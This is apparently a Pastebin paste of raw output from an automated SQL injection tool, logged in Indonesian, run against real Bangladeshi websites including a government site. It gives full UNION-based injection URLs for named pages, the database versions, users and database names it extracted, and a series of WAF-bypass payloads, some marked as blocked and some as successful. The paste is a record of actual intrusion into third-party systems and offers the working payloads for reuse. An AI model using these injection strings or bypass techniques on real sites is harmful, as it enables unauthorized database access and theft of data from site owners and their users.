Himeshvyas26

idbs

Feb 14th, 2020
205
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.96 KB | None | 0 0
  1. Version:5.5.44-0+deb7u1
  2. User server: bdgroup_foods@localhost
  3. Database: bdgroup_foods
  4. Query: www.bdfoods.com.bd/awards.php?id=5/**8**/and/**8**/0/**8**/union/**8**/select/**8**/1,2,3,4--+
  5. angka yg di tampilkan: 3,
  6.  
  7.  
  8. [INFO] www.bdp.gov.bd conection checking
  9. mencoba cek vuln dengan koma vuln sqli found
  10. [INFO] STRING based injection
  11. memulai menghitung order by 6
  12. order by yg di dapat 12 colom
  13. [INFO] Site www.bdp.gov.bd injected
  14. Version:10.3.19-MariaDB
  15. User server: bdpgov_apuser@localhost
  16. Database: bdpgov_bdpnew
  17. Query: www.bdp.gov.bd/index.php?id=56%27/**8**/and/**8**/0/**8**/union/**8**/select/**8**/1,2,3,4,5,6,7,8,9,10,11,12--+
  18. angka yg di tampilkan: 3,
  19.  
  20.  
  21. [INFO] injecting parameter amp;
  22. [INFO] injecting parameter amp;id=3
  23. [INFO] www.bpatc.org.bd conection checking
  24. mencoba cek vuln dengan koma vuln sqli found
  25. [INFO] UNION based injection
  26. memulai menghitung order by 7
  27. [INFO] WAF detected
  28. mencoba bypass dengan /**8**/and/**8**/0/**8**//*!50000UniOn*//**8**//*!50000select*//**8**/
  29. WAF BLOCKED: /**8**/and/**8**/0/**8**//*!50000UniOn*//**8**//*!50000select*//**8**/
  30. WAF TYPE: Forbidden
  31.  
  32. [INFO] WAF detected
  33. mencoba bypass dengan +and+mod(9,9)+/*!50000UniON*/%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0A/*!50000sEleCt*/+
  34. WAF BLOCKED: +and+mod(9,9)+/*!50000UniON*/%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0A/*!50000sEleCt*/+
  35. WAF TYPE: Forbidden
  36.  
  37. [INFO] WAF detected
  38. mencoba bypass dengan /**//*!12345UNION+SELECT*//**/
  39. WAF BLOCKED: /**//*!12345UNION+SELECT*//**/
  40. WAF TYPE: Forbidden
  41.  
  42. [INFO] WAF detected
  43. mencoba bypass dengan %0aand%0a0%0aUniON%0aselect%0A
  44. WAF BLOCKED: %0aand%0a0%0aUniON%0aselect%0A
  45. WAF TYPE: Forbidden
  46.  
  47. [INFO] WAF detected
  48. mencoba bypass dengan +div+0+/*!50000%55NIoN*/+/*!50000%53eLEct*/+
  49. WAF BLOCKED: +div+0+/*!50000%55NIoN*/+/*!50000%53eLEct*/+
  50. WAF TYPE: Forbidden
  51.  
  52. [INFO] WAF detected
  53. mencoba bypass dengan +and+mod(9,9)%20unION%2523aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0aSelect%20
  54. WAF Bypased lanjut inject lagi
  55. [INFO] www.bpatc.org.bd conection checking
  56. mencoba cek vuln dengan koma vuln sqli found
  57. [INFO] UNION based injection
  58. memulai menghitung order by 6
  59. connection error: periksa kembali URL atau server down
  60.  
  61.  
  62. [INFO] www.bpatc.org.bd conection checking
  63. mencoba cek vuln dengan koma vuln sqli found
  64. [INFO] UNION based injection
  65. memulai menghitung order by 3
  66. connection error: periksa kembali URL atau server down
  67.  
  68. [INFO] www.bpatc.org.bd conection checking
  69. mencoba cek vuln dengan koma not vuln
  70. [INFO] www.bpatc.org.bd/index.php?pageid=111&&id=3
  71. NOT FOUND gagal mencari error page
  72. mau paksa inject ?? y/n [INFO] coba inject manual
  73. [INFO] www.katalyst.com.bd conection checking
  74. mencoba cek vuln dengan koma vuln sqli found
  75. [INFO] UNION based injection
  76. memulai menghitung order by 4
  77. [INFO] WAF detected
  78. mencoba bypass dengan /**8**/and/**8**/0/**8**//*!50000UniOn*//**8**//*!50000select*//**8**/
  79. WAF Bypased lanjut inject lagi
  80. [INFO] www.katalyst.com.bd conection checking
  81. mencoba cek vuln dengan koma vuln sqli found
  82. [INFO] UNION based injection
  83. memulai menghitung order by 1
  84. order by yg di dapat 17 colom
  85. [INFO] Site www.katalyst.com.bd injected
  86. Version:5.6.41-84.1
  87. User server: katalyst_swml@localhost
  88. Database: katalyst_newsltr
  89. Query: www.katalyst.com.bd/newsletter/april2013/index.php?id=30/**8**/and/**8**/0/**8**//**8**/and/**8**/0/**8**//*!50000UniOn*//**8**//*!50000select*//**8**//**8**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
  90. angka yg di tampilkan: 2,2,4,7,3,4,5,6,7,9,
Add Comment
Please, Sign In to add comment